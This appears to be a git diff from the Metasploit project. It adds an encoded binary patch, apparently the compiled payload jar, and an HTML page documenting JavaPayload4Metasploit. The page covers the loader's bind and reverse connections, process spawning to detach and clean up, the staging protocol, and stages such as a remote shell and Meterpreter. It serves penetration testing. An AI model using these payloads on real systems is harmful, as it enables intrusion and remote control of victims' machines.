z#&i!M!}r*9fzIBHH`OriW9-2$2wZ3~ZMJTP_?M8f0K<y@5KSs~gXKO+LRtJh&RX?h
z1%ci(M>wmGMaMK7Wlm5A^CjsTkI2~05y|d){u{qhQgPj6#S+EtFQt<rKZr~4iKR5T
z4;_CJ`)*&o%-5mO^xGpwRli$KhY`+`{W2$%Qg8^KzH*)XMiJ<$xR$k)S_I>VS|pI0
z$>Kj-7EKFVA!75rtY6vvJBtbMt=%<Vw^Cp7YFRk0iSo%t+QDRd)5Lep(E$6G6!6E{
zA79E>mY%?fnjC6=IP}wIvn>xCR(6rnwpm@BR2hC<D^FuI@XOdLv)f{UvYyFYZj7=j
z%LT-nj$e3X50*Xufn3<=ltjNJMRRrBW){+Z75BNNeOPxjT%`G@8Gn-M%srj_*{5EM
zJm}#UWhZz2rC|Z9^-4yb+ru_4bGw@>)Z^)>A^Hkt-wu`SNb^c!S|<UbA4_9&%U48&
zPH2EgDjf~p{a2{jpKF}X=sSMdI<1fZsT<!-Y?+XZXBi!|M-q*o2v}Lw0x&ss>-?zE
z(mgsq9*huETbAN-Q16TUsse%V$qAUR7j`XEgd>cRa+y$*Y96z1Srf~=yjXu6;=2h~
z#})AFwe@)>&%${yURWb8TO>EB4jwc_DEi0tTw@GxBryfikB%yPV;xsCmw*<1ek8sp
z+^vCjJJ3zbg<dUulU<~mptdAlQvWW-<Ny@c!JmARLKmNWzwS_gJCnwZRJoU!ruq@p
z5g>qbkHDQY-F^=LMe3=(c-T53orts!!E?JK`yL*lVnJZ0GOXF_J`L4vWX(ZuJk$77
zi8U2^Sz;!M9~rY;db+)GooU^sKo3qbfu-<@mFMAF0k(}?XXIPmQ%RGM=;>daVb-`c
z(zM|Na_w(S5jgkt?&&y~fE@%NwxHLGDX#;1<6mmXwbvX>vL>=T?H8RZ1^P1xyOBBH
zp3<K8E&Oo!(Ik90OJAb(7$(LpM}RQsy{v3qobSw^_|_q^n~f9r$QqaQrYMl!HG8BZ
zYm4xu`*w0Z6<(YjPV<Xw)M+Pm+!8MSi~^Zhl=F4I{sLI#cjWh~6QZ0j(>WqpmMSLG
zO+m1esuVC=CJYq;AFbTMGSu&@Zq>lI92I-y2x}-%3b+LOz4IvjG*Fs{j`|w+XH@c6
zBqUj9s^3=*>iLip2kA_{<ww4gAWwmN6*!-Pl-LDjnh2@OI+@PT9~V-p$_utO3fC3m
zPUWlT)n*k$JCF{tFRkZ+IBWHevO72l;qk$eJ!<3FU_^w*T4VO*47w!1OZZM>zMEcT
za>HJx=wA-cj~rkhuNTGC7&K+N5v}cH!kQ%s7&}wVjU@8T*cUvo*BZ`mID`rVo?c{(
zoNEVt6Ga!}%<6)gw!0Bl^*&YwL}uU)iy82-qZ6yWBny#$QgdEV<jT*H+YiNds9H*o
z)Kel2)8j-gQ1yX#jD#;Eg-;c@z-D+Py$+~N?La#R%CLPz4`_ZV{y<1Opz?sTs&V14
z^v+a^CDK&doJ9tl9+~wZvUFpAfe~AbO%!3d4g2UCya{m@LP*yFzpXrSQ%?)UKsdG2
z5yEmW`Q=RVFqRjx1jvvMZC1^W?BLH}`*1F_0TSBdpWf1)=(|5drzrli8x85qzuYVq
zQ7)^8?A4b*c&9C1bTmTG;IPjI>tKR+3CgzCSvt_zI$H`9bW=hzNk$oCRgx&kYMkWB
z58~t$#sFlkhY;!Sa1Noz4H<r6uOR+T9;t_v@EVmSs%tK=b+5<SD97jW-y?84>^c34
z7vDsQP}jI3<o0fERI?!pXD)u^&|Om6wa{zfRF|XdW>U|L{1n&Y#@HViBW};lj;Q0U
zW5R{HxI;;-Wih9-1+Wa$Hhe{ZqxP8zYf<BM9a8}h6%fIUd{r78>%*D)X=fdg3Ol0M
zqaZIjN~lHzCU`kqhPp_8sxNE7^kS)k7&ECYD+(Fu0Yp`m^c({zjjcj0+ko5_|4rnh
z4;AV|x5+LV<V(ecvU~W`7aZtgzQ4RmmOUj~lbZ3r4u>9K9Ho2VzU}<U9>pq@T@CEi
zRAoV}vJ6Q@8o4aPsjym)N{UpL3wU3_8~;u;lDSB7PVL+H&#gjx!ro<PBD&KAbTiB}
zc@EspON_9RwRr=%fR4%zi-R;Az5v`dDT!`vmKrJXu*X~V6A3`<!GNF-){4~HmAwa(
zu^UcX?!|>9kI7*QG$l&<@NTRZKTrH{ZRF5<*mQ)ygT87lHB`TzvzBc4vmn+dc`i$4
z^mqaHCw$IF)yW`c-!+Bcs`%>xJnX|u-_8xrg}P>=mB(b$vzmHA;)8>_t%6_Po_NF(
zD?;Q6lqfOcMb!qUQG!DsiW``B@8B}!<G{Tfgh#9+V+<ulg}1W9;q9sCxzruMkX6M|
z*=dl;Lu@(kPu3Ie$cf;(DvDqfD@Q1m%o7SrS*2wtvm;j$vG*<GBiy>V8P~XAy_L&=
z^_ty@;)N;U8*OK*F=CEi-+jH8YY)I*6(rBSN|m%W@qNt{C?T@U0c$^^S};DHi-+-j
zJJ?O=p)QZQWVa57kcqTQ*~Fe<9PleYqzebLZxk0fT;gcwj+RiDMiI#^2!U+ae=lgn
zvQ1R7-A72r6_0<&4Y=%dHKfw>Ij@2HbC}{9ulRh?hCK0#Xvi09dJ7I!YNl7A#6&Yl
zs6(Z<aHIzJWT$U^K}f=@NVF%G8!JbrB3q{-Z+y!?ct;Q2MGf6mYzZrZjN`93;;&ps
zy0U%b;;&HRujED!sg0L514cLH-mm*@9H08+U;5xud{YDo3av_zpKvAVD1o|!RvU%{
zU)K*Te(=s8x~mzw%h`I+j1xV<p<qR?U>&{@i+3F+0rrrPULu<OLX-jZq=R~*c!zyM
z+5AK6eM0N~LS^W_i5zf{Um%(!v$C-U;0742z8M&$8z4_M)95IA>GX9upH~Lf_c}uG
zVTYrW)8za~9mi$-$-Xq{u4#<?5%o`u@CO#q7nVfjg@u8sfP;ad|6f=@!`9jf;GkjY
zWMS#{2O<d2FjARSB@CQgsxzo`Y6ymCl7_@N=@NXQq}#~N?6HV;b@S96(|&V2<H>rD
z&bEzpM7(Kb7DMN@8-Ge4b+QkZgT35%0It^4mx~4k-5{bU=*}nfrqWEBYe!Z0PN3N<
zN7)naG#0E2IN30msv%2Asr3=cQ++DgC__yaa~8yi?@DEFxWSaD15K>C&Yn)BE047;
z2m-3{Fq4_lQO4>eT@WuL0OM!XUJaW*LM<cBp<t{y5~Vm|gg9P191~9=dSGvZ;q_F7
zM)WHaj^Qa_w3VFL5Van5q0gO7sf7<HCJt?QU)J1kh^EYA8TThVr$EziMSJZgrW;e5
z=kkCs!Ih^Fc2wjrhegqM)+=JGR-$X8?tS$>8J`++sjYLWwT-U2DVAokvj|6#dhSS&
zro&VdT*R*r<ZnL_;)fuvf0(=7X)`KMSl-60JUadQq%Ib|0>-&#3XkP+JsHnz!Lb@U
zZpkh=tXnI~(zG9@sQ*%n2vSbm@6BAM6BhMo^UCjJJ^K}*4r4(Tt4qU7w-@d4b_Orx
z8*)$7k!=#!)`Yq-RW64}DA9n3nRF%A2;sZc$ZJAYDsT8eELzwf(zW+}*YK8Dn<X3m
z(-rTI$sTc6k!U_531>viMN-xDM{kJj3znLVE=npTRq^l(n~=Sx6o;enkEDo9TL?8~
zO=7_)IGHWu+%cU2BcxC{&M>nVw;G#=KB7;rq(9d2N_}FV$)cRKSlU~Lh6%Ce$9;%r
zzlQtI*vs@zxnp{cJ39mz7^eRjdme6<07q$OH*bL3U*Q+4Ii`XKz<vq{V5wnt#)elT
zH|r{$yMluvguL`crF@~R&;{P;{Bh(|>qD2P1gdz2Nq4y+Ma{z@jf+B;bv@(*Wt#ld
zg-k=UM8~x@e!s(eJ^?(wTB8u9j)MRBp+c+$e?H2U(j8~FC^;HF-s^+xMoSbI-<Zm-
zWX=$Rlkrx$0u}2fDsLCUFXTM}wcu*lI+XTF>}m9frFF~g!lb!zi_zho9JwL&R3u?^
zF|OUC*f@i%Mv_>I)SOx?!f$URMnbG?E^&Ej4Gg&P1Jrpqs|Kcb%B)ifRx~-~eyF{i
z-<sZ<*&@fLKP(0A68HK10$X7ot&3)u&!QIwaust%WeHz@8ZqUTHcIc(A>^(FnOSn1
zCpLW5%foGPi$E)K&pgifZWI${<soYWRzrz3oGVi9#hFvE>E%G-ou-78g^ASN(JuGC
z4-<1*PIEzGM3HD`24wh4)5N$nad@z6cInI!m~-&AT4efK8kg5)dw*u^Q)6LH_naFC
z7q?`2a?d8P$Du@AhSIOcjX39?6q%WzXcdZup*Zs2iJPB~*<~4)M(o?5G4px`ly^KR
z6x!a9e(mVi{WuOP;`eXx_mV0AmGXN~27@c{DI6GkxL3O9VzZEY(flTj&1`OV&GrX;
zrecz2I&G_gna2FI0YRhcGh3DM<kt>nvo?im${6q2tF9mS@FC0|JdO+Vv2}GD2A+v6
zXr%PMAvLTYBV|90Qh>K00<ebg+t&i(Zo2}#Zf0aS9mwk}*X7~ewSi8wwu405SIFI`
zeU3I)eV&qJuUST8bK0VC<3rYI1ccC|)lPBG9x7_U<w*c4)PZP*+zw*hz5*ex+i;=a
zSCVRBy5An9w6B@7IzA$0f8^`O`<P&i8v>LfRd#s!+A9(_8>29`_fjyOs-I0#h@44X
zGBXktj|sG{mhwt<mF#p1BQX}%FLFB*=SyIwNl;6}!|Y)p(@%n$vqP`W81Y@J(1z2O
zRF0;|)E<pEitT=wdf!SMw~R1^2AM{*gj{)`_)~jN4jA>&EV?^VlLo0(7N9#1#c^eB
z<5yO=pIg+N#RR_Q1ApP=KmPV~Fh?9Y&tKZ?b0hn&U!2Bobo|FZUhu+sQ3TNn(Fl>%
z3(?C95mOp*VI!%(2v-_W2P40xze)0892k(^pCma23YkfQBo)o|8``&r1=*sAa}!hL
zBxj`8Vd0OCD|}i&H@ASe)ygWfFpP{(F<V(fEG)2*Dw$+!#z#~XzalNA=Amk0&=3*9
zW8Xd`H>oEF$6-q&_rwCsEle#;&0t<gzmzW6)O!!qevKvB%)$Qec>i}M;FEX9slfAg
z_?{c)b91!x0Jyt2INN%#S^zvWFjbV)T;3?@u(znPb2f3dwQ#=GfqJ5-v2(I>L(Wj3
zSg4IW5Vr{>c_leHB@|XUMU~bI)JX{JUrB`j&*stoW0t?6b~i(_(3R(PD3Zd!5dKZ^
z50?MO11{x5@gdo6<oeoJeL-Q6R!ozPEenPpNVg$2Oy~nRMDm?VS(v4$CbhQ2r4H*;
z*5Z;dgugZX%vj3Zf}JJ4;@0wEb`&xB9U4t|Qkt<UgYfD~clTZQl82Q}lZ656Nx;<F
z?o-B7{>^Tl-sjspYn2c<;!_>e7_c{uk5q^b0Uyko7V>=-Y<wRPN_Y8tcxxf-h?6mB
zr}#M*&2=Fx>?HeAJiacL=+3c<g-_@%ujMskK4>7ynHkFEBNLH721Q$aQV%xi$!DL;
zKf9c=xOOLc6c6TsrVHJt!hhMh;pM#NnW`Uw8st4iM1I*`Ke4#>M|l(r7Pyuvdr$%0
zT9fak1_833s=!}*z9>K`IPdA3?@T!Fc|#v%g4cRZeEAMx4^{k(#NN>~wKHIaWW-<+
z<#Kik?MZ(?(i4w|J+6?|Ed<ly3%x0Ou}aCF>@XycQf={TRF|b#C788l9e{!rh?34p
zVQpb3&BdCos$~kJBipVXjJ!`crDjTB%@tBjBc#)NPGiWjNsQptXOEj#4`v0u3npny
zJ7wJhu;?MNZBV}66j0|~7|~?|z!9O6SUPO*Gi(kBeUTZw0B(QAby9`mI;24ZaE+_L
z493!zgV-i^>ww~zbgp=vVISHl9gYUA!D`>x!H;(74HChEnLpT_iU^E1DWO(rEgFL?
z7W&If=IJ3T-};6=1D9puf)_a*Na}lm)%lT!KHnz$V6Ya?vDX2SF@gl@j~L`Y(beGu
zqwz5(BAz@X%a~Ew!5Lao@dUrVE<gP)L2RIrf9r!jdm-%=e4mv--tuh7>#NpF=T(BA
zdlD|*5#Fs{#wuQG0OuwDKIA->+8+kqjz29?$BI!{k}Ju+DzPNX6S_9HsgNiT>Z2ES
zhWU`JQ7z>`b!SKyCVcP#sj;K!cAL_UT~>CvBbo~|(jJcRfPtg))fzpwc14Bq)<*rq
z5Bh;c3p@GWmI+k`Cz!EGgFS!X<Ty$zmfK23)8nKedQHB{tY;)ERui@yjJ1#!FWMmD
zM&~jwYsDAmGu`ZuHAM+!;R35q>hC0*K%`E{SC*3&1f?%*7UmG~`nQ(eWma!1(zNK-
zn9t266PaaXkbR^#&mFn+AqGeg5u>To?(h!a36Rj)mdLb7-dmY%-iLo@pptF$p(~bA
z3X2{!Vx#8H9BgCg4L_l>=`q@h{TgPe6x`>63b@E&7LMo`8KyJm8kFGs<WoA-z}k8!
zaaroIB#RcaY5Zcyl>!5b5k|Z4P(!2we>Wp7uafO5ObxNUCJvYRTAO|5!~(Ijve-Ag
zte?ch*q0O*n{$OvhQ**+bmi5fLIa^(QE4J5AP;hDm=f=g_t%8oA&{E}8m^~!z25>y
zBgAcFgz=(*5S$6FUx1V#NT*&@eg=cxn+}{Z>aZv8U%>|=iz)`H+0g_e-Kbe>#5@$a
zP0p5t2qLV8d!vCO)i`8(3_ltl%meR?gDHCAQSS)@NrPu*=%LBDf%1@mYg@OSj@trn
zA{q!kpV-%Vn@Y;k%s$wYp()wx_u#3GP*~AOEO{SUh{UyTut@{{^!#F1Z9bHDn!=g)
zD&me7s0*R?(S;OWOR1M!7^?Gz0;oGxK9%r?K-fYqegz5}3Ed}whoG*(CWEf<tu}7i
z-viC_^Jo_7d9=2UL7k1RJfHF2whH^@r!C0(`w2+c=}&BRQ$ee*!@%@<J+#KSIdXx~
zg3^c=x{C37`0zq#vneg8x4FrO85V8eR|r~f$#{oC0{r~K%wjZfdq=-p*M5*Z)rDwW
zd-R+~@7ea1T$h}C^(hCAS(`xm3EwvDR~WmHE-ZWg=w$dAG5kWj$JB*<o&iC&A-33p
zfqY&uSMP}!%jA_$ik2HXJv{l4Gx9y%jx2vnUQ_E#3c!dPC8wW}^ZE2*)sr@m@zN#5
zd}>BZW7#IFyxJTHDsd6|p+tXOGpH=0q}a@uZv-zAIyHGVyV~=)gdC+DK_qgkm}j8)
zalOSAtUSVlkbHrYiR+$=e=XGg8d41ndtd$@G>S8hj^;yd{CW`sb1)fJxfkVyN-rL1
z=q*F#fdSMpcx}U`n#og)MSf&Y%0~|J=~OD1t*0HFUYkK<l-oOt9G#U#a~}uR(e10>
zNCBU0*yor{BHxn-=Ihj>-M@HLg~UULV1q)Ok%7r<Pxxyap`UIbZ%3D;%NXS*6*~}=
zWv{t{PasnWkFY_Ekg+#Xv_m!;(kh8l*(t2+&j~PnV9K|30f4R7H^Q%I>)I`bufAuP
zS4bw)e$XT4oDnA8WYoOryiknD2}UPkFj&9eW`fsJ`rzWoq^_?*%k8yV8r;^_B)P25
zR7%fCO!BA`K0mo`=%rYkFkrX$+0kzhHF-g?@J{zihS|b4`CZ#5yxy}jCHOH-jh*)!
z)LHDDG)4%n3H6HR$mx$JqjwIDny&!4avE!WWl1BGM7eEfHlXBRAQJ_Pi&e_*uX<@N
zQaevWg=8NjD>&tgvi-h@ByFHdBF5~a$b+=mWXNm?DvLbX&1stGXf53d*F(TZ-6f#e
zH&z68w!*ec7N3KCk7N8TC{pF*Tjt#v^o3~}rRY2myo@J^UC9bGhskB{CY8J2b&Sj6
zm2^klvno-VrxIEiytN%fYvgD?o%$FnlwtI-3591mxM{)xB`OAYzE--*k36A8NoC@!
z-7+{Fm{G5Ptg&t<M_y`SYfqm%?P=$m6U_1^r$K2k`-m_$yO|`cF{TnPR?0B>9u2g|
z-ek3JD|hR-9+l75Zi#FS&RW(_ImZmw7ArBUpEkSudNlQ6o3?1G$?)c~4J6E5G-s8i
z&6U__*p_@}7chtD`Z6{#PkVbmwetLB>P0ZskY)^8J{Fp`DO#l`>sK>ZXFX`gTk6CH
zL3qK|CbC*h$ohPl0~JS_x8F<FvRR!7CtAO-Nly87(~P@?9P$!}WVV?U6TCaLl63f;
zmBv+-10;duIWC&w^Qu8b*i+rq0n)d!Q#z^Ut|I%mvicNe0q~BfEa4HA<3zr?LLK=v
zA6@iJMW_XLLr0scSrb@wSF2KvPv=N~mDh6WsEf%L_ndhLaOZKz`A%xS<r3PJIE#0M
zWLEx4p^a=+<SlIsf$O@+ZqldXD(A$nIA-W?neTU?C!BS$s$r9r87)w3@QLvG(I6f9
zO*+7#K(R895kx*pM4eJ*FyT9I6|o)Ro#==u_dz7~LXFiVhlG!c>wAx4cPAT$2dnCg
zVyLgvHU$x(`-<|$O73*BfBQjuG0<v><_Dj&0Lu(5>ON-?aXN8j@orY#By=ZpO<!L5
z*t;_Z&aYExECu+KzRK7~UK7kNgb72g+hashtL>6+H8Gc<f1Z4E!-&Ruj>PgBxN`el
zdFN%9g}1|kQ;|ja^hc3o+k3j>D%&z=QI~n8kh=`e9ytDtFexBtFVH14ey6Kk?4x4H
zGS7>=S=DWgvH~hMQlU)<o$M7ivVhTYLa4lRGH*s`6{%0aJogrOaTZcN(vy^+;h7gQ
z>NlSWCyJ$T7%&DLb1zWt`Dm5Cc7gnpE^2K%MyY3%G=~dfur26~I*Hby<&CM0rP!Ax
z`$&nHGo@l^D$0S<O8H?*Ys7n<rUv5~Y$h&}&nJgQyI~XB3>V)m;OG~}j^;4Vs=iVa
zPFAI;s<`ZRcayF7$mBMSZEO4-w?6ZzT737>?$dmMmy32%m|1VozxP(?Fav4M23`VD
zSE+N~U*JTZeAZ~7Bz3)IMUgSAlDv<gcG6bmLz*a*Z{<Wfp(cX@87CAVO^h~_b38ba
z2b4n5w$iC6DyhANOft=jCtB6Y<iQH06Z4OD^=|O2n$`EK7bUq85b{XNo0UOY7k)KC
z-Pld*HIcp2(^OYJt&^@9Z!P1MpMECHGXgX>D_Ei4uyvRtc+)SbLXGR>%L}ZCm*j#1
zuV_5NQe1U8FtVvYU38i~ZcdntLY`Ifm~CMed2JCwv(s7)3H8}?1}BGriHf$efX~U(
zGCm$x`s!*Gy<gwli`TvmwwpuM|Ju_A6%#vp^djz+EHz2hQu%x$u%lU<5q8`bs{Hj!
zGU$@XP3ac-lM%sUFgyYGT{+;jx+uzGq~R<!C6l0dlKf<2avJXz<YCr@nxiB7(OU+%
zM1wA%{LTZ{tcn}OPu58YBfYYY6rIQap8O16%9F#~|KLDXi!?BvY1fnwmkKFn%FzG%
zD0{P^>GjQOk-O51rPZ!@(DboFy9!vgpW}sG9A#fzVF`hR9On&u31MI|hKe2(zXJ?k
zLX_9IZi|*j$IGdOg)^Si*N)s3oI4-~d4Su5pmk{C264}@qnPuz-w-14vx>hW%_w~r
z9yC5u9zs?!EX95GTI%LGW1(eSfYP2SaSYcc>#5;lp!2ZbQBLtjSQx=gnEzgFX(f<5
z-$Qv4q@hypGRn`UQph@l=`%!`5I{kU^vWMSnd$Y+t~a@>FvoF;FU!{l7v4)%ZZaWw
zrbs^tVPUDBRf&(H*Vye1<&E!EO!j>5t&x8yozKp?&<g`~UVZK8>gw(hqjaBw5p)i9
ze}G?Ba2oXxaYJ6RS$gSqD>8a>U`}do9khAp6X=dPa*eWxgFOyYI<-^`e@(+^(&)A<
z47X{WKNd~sCcxLn(Th`2iho6joO<+7NxIBiAaMAwC6_<h^8klrwDsVuH!^0s+Zsa1
z)~nD)xJSuh5%LfR<z4U%O<}GE@j}}Px(-2wq`;kzTJd0`G-YR#?d6rD8u#lD%Wx|t
z2UBjk_)V?p4L^&$JGIi+Isn_n1=qQgD;Dryn!oEoR+LCa*eY33=U|LduFYuKavCw1
zv1Vr+#q`obaZjHR{Xx!$e1-}q!m>@qdNTDvaSd6A+DRpmQH81Z39Y{bjpD@!+=t&I
z4fg0Q8p(i!GeRSy5c$7-UWs{{)=p2=9hu7YTra*Ez2wYk+N4+r>2ou=6cbwF!H7fN
z|G|$^x69(~9x^7tHrGGP#nUh!0%y2!caIMQz>-h)P!Fv)oTx34MY7$-DS`n_*RJiB
zAzmg;Y2Mf5&C1TL8o2i_R25#p;=}##YQ5)k@v~sV9E<(F|5cFpNA2F9rhib2zgO@5
zHux<i!OYM7U#9<7%lGe-|E~Z0hx$Le-(_`w$nVMLo`?TgWcTOX|NqecyUgwn`EB|5
zJp6adKa1}EwEtu6e=ocH(?dxx>x=(p|5p*-zqat-LH)lRN#XntNB<w&|J~`|3GBa|
z_Tc?5r~i$|{@w52In%%Va=rR*e*cX+{kyCG#&-VY3iX+-{3q%8m+k+5dB2IxAM*R<
ux%`LiGr#%IxAu2}^QUP^aOU3(|DETkDj*>K)<k>0&YyECHNO)oF#iYQleZ@T

literal 0
HcmV?d00001

diff --git a/external/source/javapayload/index.html b/external/source/javapayload/index.html
new file mode 100644
index 0000000000..51d3eea33b
--- /dev/null
+++ b/external/source/javapayload/index.html
@@ -0,0 +1,331 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
+<html>
+<head>
+<style type="text/css">
+body {
+	font-family: Verdana, Arial, sans-serif;
+	font-size: 10pt;
+}
+
+p {
+	margin-left: 2em;
+	margin-right: 2em;
+}
+</style>
+<title>JavaPayload4Metasploit - Single payload loader class to
+be used in the Metasploit project</title>
+</head>
+<body>
+<h1>JavaPayload4Metasploit - Single payload loader class to be used
+in the Metasploit project</h1>
+
+<p><i>&copy; 2010 Michael 'mihi' Schierl, <tt>&lt;schierlm
+at users dot sourceforge dot net&gt;</tt></i></p>
+
+<h2>Introduction</h2>
+
+<p>The <a href="http://schierlm.users.sourceforge.net/JavaPayload/">JavaPayload</a>s
+contain useful payloads written in pure Java. But they assume that the
+attacker has a Java VM on his machine, as the the builders and stage
+handlers are written in Java. In addition, when creating a new payload
+class that should reside in a signed jar, the jar has to be re-signed as
+classes have changed.</p>
+
+<p>In contrast, this package contains a single <i>metasploit.Payload</i>
+class which is configured by a property file in the classpath (i. e. in
+the same jar). As it is possible to add unsigned resources to a jar
+without requiring to re-sign it, and as it is easy to manipulate zip/jar
+files from Ruby, this makes it possible to leverage the powers of
+JavaPayload from Metasploit which is written in Ruby and not in Java.</p>
+
+<h2>System requirements</h2>
+
+<p>Same as JavaPayload. JRE 1.2 on the victim machine is enough <tt>:-)</tt></p>
+
+<p>On the attacker machine, no Java at all is required.</p>
+
+<h2>How to use the <i>Payload</i> class.</h2>
+
+<p>The <i>Payload</i> class is (among a collection of JavaPayload
+stage classes) stored inside <tt>JavaPayload4Meterpreter.jar</tt>.</p>
+
+<p>It is a standard java main class (i. e. it has a <tt>public
+static void main(String[])</tt> method), so the most obvious way to invoke it
+is putting it into a Jar file whose manifest's <tt>Main-Class</tt>
+attribute is <tt>metasploit.Payload</tt>. The resuling jar can be
+started using <tt>java -jar jarfile.jar</tt>. There are 3 example jars
+available that use this technique; they are described later.</p>
+
+<p>Alternatively, the main class can of course be called from other
+classes, like <tt>metasploit.Payload.main(null);</tt>, as the arguments
+parameter is ignored. Note that in a sandboxed environment the caller
+needs to have all permissions, and also the <i>Payload</i> class has to
+be loaded with all permissions. In case there is untrusted code on the
+stack trace (but the direct caller has all permissions), the call has to
+be wrapped in a <a
+	href="http://download.oracle.com/javase/1.4.2/docs/api/java/security/AccessController.html#doPrivileged(java.security.PrivilegedExceptionAction)">doPrivileged</a>
+call (like it is done in the several well known public exploits for
+CVE-2008-5353).</p>
+
+<p>Once loaded, the class will lookup a file called <tt>/metasploit.dat</tt>
+from the class path and load it as a <a
+	href="http://download.oracle.com/javase/1.4.2/docs/api/java/util/Properties.html#load(java.io.InputStream)">Property
+file</a> (basically a text file with <tt>Name=value</tt> lines, but note
+that some special characters need escaping). If the file cannot be
+found, default values are used.</p>
+
+<p>Depending on the property values (see below), the class will then
+optionally write itself to disk and spawn a sub-process (once or several
+times) to disconnect the payload from the calling process. All temporary
+files will be deleted afterwards. (Even on Windows it is possible to
+delete a running class file as technically, not the class file but the
+Java VM is running).</p>
+
+<p>After that, it will either listen on a port and accept a socket,
+create an active socket connection, or (for debugging purposes) just
+uses standard input and standard output; in any case, the resulting
+input/output streams are used for the staging</p>
+
+<p>The property file can configure an <i>embedded stage</i> which
+will be loaded directly from the current classloader (i. e. JAR). Note
+that this feature cannot be used from a sub-process, as the rest of the
+JAR file will not be available any longer there.</p>
+
+<p>If no embedded stage is configured, the stage is loaded from the
+input stream instead (see below for the data format).</p>
+
+<p>Once the stage is loaded, the streams are handed to the stage.
+Stages may require optional parameters (a string) which can be given
+either in the property file or by using the <tt>SendParameters</tt>
+stage from JavaPayload.</p>
+
+<p>When the stage quits, the payload class terminates and cleans up
+after itself if needed.</p>
+
+<h2>Supported properties (and their default values)</h2>
+
+<h3><tt>Spawn</tt>(<tt>=0</tt>)</h3>
+
+<p>The number of java processes that should be spawned. <tt>0</tt>
+will run the payload inside the original process, <tt>1</tt> will spawn
+once (to continue running when the original process terminates), and <tt>2</tt>
+will spawn twice (on certain popular operating systems it is impossible
+to obtain parent process informaion if the parent process has already
+died).</p>
+
+<h3><tt>EmbeddedStage</tt>(<tt>=</tt>)</h3>
+
+<p><b>Note: </b> this option will not work with the <tt>Spawn</tt>
+option!</p>
+
+<h3><tt>StageParameters</tt>(<tt>=</tt>)</h3>
+
+<p>Additional parameters to be used by the stage, regardless whether
+it was embedded or not. Only few stages support/require parameters.</p>
+
+<h3><tt>LPORT</tt>(<tt>=4444</tt>)</h3>
+
+<p>Port to listen on or to connect to (if <tt>LHOST</tt> is also
+set). If explicitly set to <tt>0</tt>, no connection will be made, but
+standard input/output streams will be used instead.</p>
+
+<h3><tt>LHOST</tt>(<tt>=<a></a></tt>)</h3>
+
+<p>Host to connect to. If not set, the payload will listen instead.</p>
+
+<h2>Staging protocol</h2>
+
+<p>The staging protocol is quite simple. All classes are sent
+uncompressed (as they are inside the .jar file). Each class is prefixed
+by a 32-bit big-endian size. After the last class, a size of 0 is sent.
+The classes will be defined in the order they are sent (i. e. they can
+only refer to classes defined before), and the last sent class will be
+loaded as a stage.</p>
+
+<p>In case of an embedded stage, no staging is used - the stream is
+directly passed to the stage.</p>
+
+<h2>Supported stages (in alphabetical order)</h2>
+
+<p>The stages are original <a
+	href="http://schierlm.users.sourceforge.net/JavaPayload/">JavaPayload</a>
+stages to make updates easier. All stages listed here can be used
+without special "Java" tricks (like serialization or JDWP protocol), to
+easily use them from Ruby.</p>
+
+<h3><tt>Exec</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd>javapayload.stage.Stage, javapayload.stage.StreamForwarder,
+	javapayload.stage.Exec</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
+	<dd><tt><b>Exec</b> <i>commandline</i></tt></dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>raw Input/output streams</dd>
+</dl>
+
+<p>Execute an executable on the target machine and forward streams.
+Stdout and Stderr are merged automatically.</p>
+
+<h3><tt>JSh</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd>javapayload.stage.Stage, javapayload.stage.JShSignalSender,
+	javapayload.stage.JShStreamForwarder, javapayload.stage.JSh</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
+	<dd>Not supported</dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>Plain text</dd>
+</dl>
+
+<p>A simple shell written in pure Java.</p>
+
+<pre>Supported commands:
+     help   - show this help
+     info   - list system properties
+     pwd    - show current directory
+     cd     - change directory
+     ls     - list directory
+     exec   - execute native command
+     cat    - show text file
+     wget   - download file
+     telnet - create TCP connection
+     paste  - create text file
+     jobs   - list or continue jobs
+     exit   - Exit JSh</pre>
+
+
+<h3><tt>Meterpreter</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd>javapayload.stage.Stage,
+	com.metasploit.meterpreter.MemoryBufferURLConnection,
+	com.metasploit.meterpreter.MemoryBufferURLStreamHandler,
+	javapayload.stage.Meterpreter</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
+	<dd>Optional parameter <tt>NoRedirect</tt> for debugging.</dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>Meterpreter protocol</dd>
+</dl>
+
+<p>Loader to load the Java version of Metasploit's own
+post-exploitation toolkit.</p>
+
+<h3><tt>SendParameters</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd><i>all classes needed by the stage to use</i>,
+	javapayload.stage.SendParameters</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
+	<dd>Not supported</dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>First transfer of parameters, then as the stage to use</dd>
+</dl>
+
+<p>"Intermediate" stage that can be used to change the stage
+parameters in cases where they cannot be cast in stone when the payload
+is built.</p>
+
+<p>After sending the stage, but before sending data for the stage,
+you have to send the parameters:</p>
+
+<p>The parameters start with a unsigned big-endian 16-bit integer
+that specifies the number of parameters. Then each parameter is sent in
+Java's <a
+	href="http://download.oracle.com/javase/1.4.2/docs/api/java/io/DataInput.html#readUTF()">modified
+UTF string format</a>. After that, the actual data for the stage can be
+sent.</p>
+
+<h3><tt>Shell</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd>javapayload.stage.Stage, javapayload.stage.StreamForwarder,
+	javapayload.stage.Exec</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
+	<dd>Not supported</dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>Plain text</dd>
+</dl>
+
+<p>This stager loads /bin/sh on Unix systems and cmd.exe on Windows
+systems, and else just behaves like the <tt>Exec</tt> stage.</p>
+
+<h3><tt>SystemInfo</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd>javapayload.stage.Stage, javapayload.stage.SystemInfo</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
